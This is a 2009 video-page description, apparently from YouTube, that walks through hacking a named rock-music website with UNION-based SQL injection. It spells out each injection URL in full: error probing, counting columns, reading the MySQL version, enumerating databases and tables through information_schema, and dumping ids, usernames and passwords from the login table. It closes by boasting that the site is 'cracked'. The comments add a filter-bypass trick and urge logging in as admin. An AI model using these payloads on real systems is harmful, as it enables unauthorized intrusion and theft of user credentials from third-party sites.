SQL Injection
Loading...
Uploaded by projectneedle on May 13, 2009
today i will be showing you how to hack a website using SQL injection
the site we will be hacking today is a rock site lets see shall we :
http://www.rockforlife.org/article.php?id=10253
now lets see if this is vuln. to SQL injection so we add a ' at the end like this :
http://www.rockforlife.org/article.php?id=10253'
if you see this sql error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
that means yes it is vuln. to sql now we can go to the next step
we need to see how many coulmns this page has so we do this :
http://www.rockforlife.org/article.php?id=10253 order by 1
now we keep changing the number until we get an error so lets try a few :
http://www.rockforlife.org/article.php?id=10253 order by 10 no error
http://www.rockforlife.org/article.php?id=10253 order by 15 yes it gave an error it gave us this error :
Unknown column '15' in 'order clause'
this means the page has 14 coulmns now we can move on
now we want to select all the coulmns to see which coulmn is vuln. to SQL like this:
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
now you should see some number(s) on the page in our case we got 2 and 5 this mean coulmn 2 and coulmn 5 are vuln. to sql
so now lets see which version this site uses for mysql and since we have two vuln. coulmns we can use anyone of them
i will use coulmn number 2 like this :
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14--
the @@version lets us see what version the mysql is and since coulmn number 2 is vuln. we can inject sql commands through it
so now lets go to the next step :
now mysql 5 has the information schema and that saves us alot of work cuz in version 4 we had to search for the coulmns and other stuff
while in version 5 the information schema tells us everything that we need so we inject this code to the site to see all the database(s)
that the site has :
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.schemata
as you can see we got all of the databases lets continue :
now we want the main database and its tables so we do this :
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
yaaay you see all that ? :P all we need is the table that is called login =D so we do this :
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=login
and this will give us an error have no worries all we need to do is hex the table name like so :
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=char(108,111,103,105,110)
and BAAAM!!! you see that baby ?!!
so now we want the id,user,pass,user_id and password so lets get them shall we ? like this :
http://www.rockforlife.org/article.php?id=-10253 UNION ALL SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14 from login
Congratz site h4x3d and cracked WHO SAID YOU CANT KILL ROCK ?!?! we just did ;)
Link to this comment:
Uploader Comments (projectneedle)
All Comments (26)
-
@MegaArkade Cool Story /B/RO tell it again!
-
@PhiberOptics idiot video make people learn it's better then writing lame comments like you
-
@doduclinh string converted in ascii
-
nice bro i am using your methods too xD and encoding in hex also you can bypass UNION Illegal operation by typing unhex(hex(table_schema)) ;) or aes_decode(aes_decode
-
Its text "Login" converted to ACII/hex language.
-
woohhh you hacked Fuck you now go and login with admin coz u got thier user name and pasward manage theie website now comon go ahead :P
-
Awesome video but what is the in browser sql injector you have? I'm not even sure if that's what its called?
-
what is 108,111,103,105,110?
-
@PhiberOptics lol u mad? Go cry.
45 videos
YouTube Mix for All Shall Perish
7:04Best SQL inejecion on Facebookby 0682212,264 views
- 3:05SQL Injection [Hacksessful]by Hacksessful7,646 views
- 7:50Hack a Website using a SQL Injection (Sinhala) ...by ashankodagoda8,463 views
- 10:22SQL Injection tutorialby acunetix9,330 views
- 6:06Database Hacking: Client Side Database Protocol...by ImpervaChannel11,383 views
- 4:42How to find SQL Injection vulnerable sites usin...by SandyTanner19,606 views
- 5:17Website Hacking by Automatic SQL Injection usin...by SandyTanner6,551 views
- 5:53Hacking A Site! Remote SQL Injectionby noimus1318,102 views
- 5:06How to Hack Websites using SQLI Helper v 2.7 =T...by T4S3MU12,685 views
- 10:49SQL Injection Explainedby 7Safe14,458 views
- 3:21sql injection part 1by pratiksrc9,283 views
- 13:12How to Manually SQL Injectby PhiberOptics3,002 views
- 1:33sql injection(100% working)by jonesrulz29,223 views
- 10:34Site Hacking Sql Injectionby rasim505029,947 views
- 8:29Hacking via Sql Injection By PersianHackerby Persianhacker40,686 views
- 3:22How to hack many websites! (Admin)by StepbyStepTutorials79,005 views
- 1:50sql injection- small guideby wertyuiop4087,222 views
- 5:55SQL-Injection - Microsoft SQL Server - Teil 1by csecmag7,747 views
- 3:59network hacking - hacking LAN networks the easy...by projectneedle3,177 views
- 7:35SQL Injection Tutorial Basicsby dragonlover6197,974 views
thanks guys
projectneedle 2 years ago
perfect tut bro
und3rcore 2 years ago
thanks bro :)
projectneedle 2 years ago